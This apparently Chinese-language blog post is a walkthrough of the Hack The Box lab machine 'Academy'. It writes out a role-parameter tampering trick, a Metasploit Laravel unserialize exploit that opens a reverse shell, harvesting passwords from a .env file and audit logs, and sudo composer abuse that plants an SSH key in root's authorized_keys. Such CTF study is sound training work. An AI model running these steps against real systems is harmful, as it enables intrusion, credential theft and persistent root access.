Lluna's Pure land.

What is life like when singing to wine?

0%

HTB-[academy]

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 15k 阅读时长 ≈ 14 分钟

0x00.简述

0x01.信息收集

可以看到开放了22、80端口,域名为academy.htb及服务器等信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@JIYE:~/htb/academy# nmap -sC -sV -sT 10.10.10.215 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-09 01:02 EST
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.43 seconds
root@JIYE:~/htb/academy#

0x02.访问80端口

首先添加一条hosts [10.10.10.215 academy.htb],发现一个登入与一个注册框

注册一个账号并登入,手动爬虫,没有什么可用的信息

0x03.列出目录(403/404)

使用wfuzz进行模糊测试

得到以下目录

config

admin

index

home

login

register

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@JIYE:~/htb/academy# wfuzz -u http://academy.htb/FUZZ.php -w /usr/share/wordlists/dirb/small.txt --hc 404,403 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************
Target: http://academy.htb/FUZZ.php
Total requests: 959
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000213:   200        0 L      0 W      0 Ch        "config"
000000059:   200        141 L    227 W    2633 Ch     "admin"
000000434:   200        76 L     131 W    2117 Ch     "index"
000000411:   302        1049 L   4114 W   55034 Ch    "home"
000000498:   200        141 L    226 W    2627 Ch     "login" 
000000684:   200        148 L    247 W    3003 Ch     "register"                    
Total time: 9.694324
Processed Requests: 959
Filtered Requests: 953
Requests/sec.: 98.92385

root@JIYE:~/htb/academy#

0x04.查看register目录源码

发现了隐藏域

隐藏域参考1

隐藏域参考2

0x05.bp抓包

修改roleid的值为1,向后台传值,且用户名后也需要加1;发送,http状态码需要为200

0x06.访问admin目录

1.demo1登入

2.登入成功

可以看到解决dev-staging-01.academy.htb的问题在推迟中,与两个用户

cry0I1t3

mrb3n

3.访问dev-staging-01.academy.htb(需添加hosts)

发现服务器敏感信息,应用为Laravel

0x07.Google搜索Laravel exp进行利用

发现可以使用MSF进行利用

0x08.msf利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@JIYE:~/htb/academy# msfconsole -q
msf5 > 
msf5 > search Laravel
Matching Modules
================
   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution

msf5 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf5 exploit(unix/http/laravel_token_unserialize_exec) > 
msf5 exploit(unix/http/laravel_token_unserialize_exec) > show options 

Module options (exploit/unix/http/laravel_token_unserialize_exec):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   APP_KEY                     no        The base64 encoded APP_KEY string from the .env file
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to target webapp
   VHOST                       no        HTTP server virtual host
Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic

1.设置本端主机

1
2
msf5 exploit(unix/http/laravel_token_unserialize_exec) > set lhost tun0
lhost => 10.10.17.216

2.设置对端主机

1
2
msf5 exploit(unix/http/laravel_token_unserialize_exec) > set rhosts academy.htb
rhosts => academy.htb

3.设置app_key

1
2
msf5 exploit(unix/http/laravel_token_unserialize_exec) > set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
app_key => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

4.设置虚拟主机

1
2
msf5 exploit(unix/http/laravel_token_unserialize_exec) > set vhost dev-staging-01.academy.htb
vhost => dev-staging-01.academy.htb

5.exploit得到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
msf5 exploit(unix/http/laravel_token_unserialize_exec) > options 

Module options (exploit/unix/http/laravel_token_unserialize_exec):

   Name       Current Setting                               Required  Description
   ----       ---------------                               --------  -----------
   APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     academy.htb                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                            yes       The target port (TCP)
   SSL        false                                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                                             yes       Path to target webapp
   VHOST      dev-staging-01.academy.htb                    no        HTTP server virtual host
Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.17.216     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf5 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.17.216:4444 
[*] Command shell session 1 opened (10.10.17.216:4444 -> 10.10.10.215:39152) at 2020-12-09 03:07:26 -0500

whoami
www-data
pwd
/var/www/html/htb-academy-dev-01/public
ls
css
favicon.ico
index.php
js
robots.txt
web.config

6.升级交互shell

1
2
3
4
5
6
7
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@academy:/var/www/html/htb-academy-dev-01/public$ 
www-data@academy:/var/www/html/htb-academy-dev-01/public$ ls
ls
css  favicon.ico  index.php  js  robots.txt  web.config
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd ../../
cd ../../

7.手动爬虫得到了一个口令mySup3rP4s5w0rd!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
www-data@academy:/var/www$ pwd
pwd
/var/www/html
www-data@academy:/var/www/html$ ls
ls
academy  htb-academy-dev-01  index.php
www-data@academy:/var/www/html$ cd academy
cd academy
www-data@academy:/var/www/html/academy$ ls
ls
app        composer.json  database      public     routes      tests
artisan    composer.lock  package.json  readme.md  server.php  vendor
bootstrap  config         phpunit.xml   resources  storage     webpack.mix.js
www-data@academy:/var/www/html/academy$ ls -la
ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13 12:42 .
drwxr-xr-x  4 root     root       4096 Aug 13 12:36 ..
-rw-r--r--  1 www-data www-data    706 Aug 13 12:42 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
drwxr-xr-x  3 www-data www-data   4096 Feb  7  2018 bootstrap
-rw-r--r--  1 www-data www-data   1512 Feb  7  2018 composer.json
-rw-r--r--  1 www-data www-data 191621 Aug  9 11:57 composer.lock
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 config
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 database
-rw-r--r--  1 www-data www-data   1150 Feb  7  2018 package.json
-rw-r--r--  1 www-data www-data   1040 Feb  7  2018 phpunit.xml
drwxr-xr-x  4 www-data www-data   4096 Nov  9 10:13 public
-rw-r--r--  1 www-data www-data   3622 Feb  7  2018 readme.md
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 resources
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 routes
-rw-r--r--  1 www-data www-data    563 Feb  7  2018 server.php
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 storage
drwxr-xr-x  4 www-data www-data   4096 Feb  7  2018 tests
drwxr-xr-x 38 www-data www-data   4096 Aug  9 11:57 vendor
-rw-r--r--  1 www-data www-data    549 Feb  7  2018 webpack.mix.js
www-data@academy:/var/www/html/academy$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

8.经过尝试发现cry0l1t3可以登入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@academy:/var/www/html/academy$ cd /home
cd /home
www-data@academy:/home$ ls
ls
21y4d  ch4p  cry0l1t3  egre55  g0blin  mrb3n
www-data@academy:/home$ su cry0l1t3
su cry0l1t3
Password: mySup3rP4s5w0rd!!

$ /bin/bash
/bin/bash
cry0l1t3@academy:/home$ 

cry0l1t3@academy:/home$ cd ~
cd ~
cry0l1t3@academy:~$ ls
ls
user.txt
cry0l1t3@academy:~$ cat user.txt
cat user.txt
***************************
cry0l1t3@academy:~$

0x09.提权

1.尝试sudo -l进行提权 ,霸特没有

1
2
3
4
cry0l1t3@academy:~$ sudo -l
[sudo] password for cry0l1t3: 
Sorry, user cry0l1t3 may not run sudo on academy.
cry0l1t3@academy:~$

2.对SElinux的日志进行审计

参考文献

可以看到有一个用户进行过su

1
2
3
cry0l1t3@academy:/var/log/audit$ cat * | grep 'comm="su"'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
cry0l1t3@academy:/var/log/audit$

解码hex

密文:6D7262336E5F41634064336D79210A

原文:mrb3n_Ac@d3my!

根据密码可以推测为mrb3n的密码

3.mrb3n登入

1
2
3
4
cry0l1t3@academy:/var/log/audit$ su mrb3n
Password: 
$ /bin/bash
mrb3n@academy:/var/log/audit$

sudo -l提权

1
2
3
4
5
6
7
8
mrb3n@academy:/var/log/audit$ sudo -l
[sudo] password for mrb3n:  
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
mrb3n@academy:/var/log/audit$

4.composer提权

参考

直接进行利用霸特失败了🙃

1
2
3
4
5
6
7
8
9
10
mrb3n@academy:/var/log/audit$ TF=$(mktemp -d)
mrb3n@academy:/var/log/audit$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/var/log/audit$ composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
> /bin/sh -i 0<&3 1>&3 2>&3
$ 
$ whoami
mrb3n
$

更换思路,利用ssh公钥进行提权

首先使用ssh-keygen生成公钥与私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@JIYE:~# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:FKBkE5JZ5qaTiSzGFeu24nBc+9uHrMC4EI1Q6/gOXnc root@JIYE
The key's randomart image is:
+---[RSA 3072]----+
|  o=B....        |
| .oBoo   .       |
|. .o+   .        |
|+*o=   .         |
|*+Bo.   S        |
|o+.=..           |
|+.=o+. E .       |
|+=o..o..o .      |
| oo   +o..       |
+----[SHA256]-----+
root@JIYE:~# cd .ssh/
root@JIYE:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts
.pub为公钥
root@JIYE:~/.ssh# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIuoa+nxwrqqxtdN5zqWblCzN6U6ltR0eZXI+tnPHt2Dx/6ms2bEqSmAV66ETVyjXQKe2fHzNWdhjj4Y48M4eQY+iSR/IxqfxxLysspB0hzylreY+/ScKwvA7LcxoIUR8D5YZq5kGkGR50sO2m16l7kb2X7A9FO6SHTRPbGKlnFI7kypQCoYmgLX7czaci3Ol0pVpYAhFEiNZIt43uU8uwvGELQnj5j9pcPrJU7yDqA/Xm11PUe9x6wrUKmW3pwhiHLT/ONJm8OzBiGvIaAxEK/DvVarrt+DjrlXAugZw87aip+SlBJSpQDWPxk8rAwvCLx1lVvFRekPIvByaRwHHNYypenZHKJi8UCWwEKM004uw4gEuG6VKciPd/eCnrx5Xrufrg2IW9foB9JAFKUICN/be73uJe8DbGn0hLRN+Yr0rE7CDw+ZPqAMp4bKrf9FicUS8fS1eUmAMjIAAN6j6zbI2ftU5EaoJ27CW2evknUcSbgO7fx6hxwt0dliCpXZc= root@JIYE

依次编写

1
2
3
4
5
6
7
8
9
10
11
mrb3n@academy:~$ TF=$(mktemp -d)
mrb3n@academy:~$ vim $TF/composer.json
{"scripts":{"SSH":"echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIuoa+nxwrqqxtdN5zqWblCzN6U6ltR0eZXI+tnPHt2Dx/6ms2bEqSmAV66ETVyjXQKe2fHzNWdhjj4Y48M4eQY+iSR/IxqfxxLysspB0hzylreY+/ScKwvA7LcxoIUR8D5YZq5kGkGR50sO2m16l7kb2X7A9FO6SHTRPbGKlnFI7kypQCoYmgLX7czaci3Ol0pVpYAhFEiNZIt43uU8uwvGELQnj5j9pcPrJU7yDqA/Xm11PUe9x6wrUKmW3pwhiHLT/ONJm8OzBiGvIaAxEK/DvVarrt+DjrlXAugZw87aip+SlBJSpQDWPxk8rAwvCLx1lVvFRekPIvByaRwHHNYypenZHKJi8UCWwEKM004uw4gEuG6VKciPd/eCnrx5Xrufrg2IW9foB9JAFKUICN/be73uJe8DbGn0hLRN+Yr0rE7CDw+ZPqAMp4bKrf9FicUS8fS1eUmAMjIAAN6j6zbI2ftU5EaoJ27CW2evknUcSbgO7fx6hxwt0dliCpXZc=' >> /root/.ssh/authorized_keys"}}

mrb3n@academy:~$ sudo composer --working-dir=$TF run-script SSH
[sudo] password for mrb3n: 
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIuoa+nxwrqqxtdN5zqWblCzN6U6ltR0eZXI+tnPHt2Dx/6ms2bEqSmAV66ETVyjXQKe2fHzNWdhjj4Y48M4eQY+iSR/IxqfxxLysspB0hzylreY+/ScKwvA7LcxoIUR8D5YZq5kGkGR50sO2m16l7kb2X7A9FO6SHTRPbGKlnFI7kypQCoYmgLX7czaci3Ol0pVpYAhFEiNZIt43uU8uwvGELQnj5j9pcPrJU7yDqA/Xm11PUe9x6wrUKmW3pwhiHLT/ONJm8OzBiGvIaAxEK/DvVarrt+DjrlXAugZw87aip+SlBJSpQDWPxk8rAwvCLx1lVvFRekPIvByaRwHHNYypenZHKJi8UCWwEKM004uw4gEuG6VKciPd/eCnrx5Xrufrg2IW9foB9JAFKUICN/be73uJe8DbGn0hLRN+Yr0rE7CDw+ZPqAMp4bKrf9FicUS8fS1eUmAMjIAAN6j6zbI2ftU5EaoJ27CW2evknUcSbgO7fx6hxwt0dliCpXZc=' >> /root/.ssh/authorized_keys
mrb3n@academy:~$

ssh进行连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root@JIYE:~/.ssh# ssh -i id_rsa root@10.10.10.215
kex_exchange_identification: read: Connection reset by peer
Connection reset by 10.10.10.215 port 22
root@JIYE:~/.ssh# ssh -i id_rsa root@10.10.10.215
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Wed 09 Dec 2020 11:36:12 AM UTC
  System load:             0.0
  Usage of /:              44.4% of 15.68GB
  Memory usage:            21%
  Swap usage:              0%
  Processes:               178
  Users logged in:         1
  IPv4 address for ens160: 10.10.10.215
  IPv6 address for ens160: dead:beef::250:56ff:feb9:c8a
 * Introducing self-healing high availability clustering for MicroK8s!
   Super simple, hardened and opinionated Kubernetes for production.

     https://microk8s.io/high-availability
0 updates can be installed immediately.
0 of these updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Nov  9 10:11:49 2020
root@academy:~# ls
academy.txt  root.txt  snap
root@academy:~# cat root.txt 
********************
root@academy:~#
-------------纸短情长下次再见-------------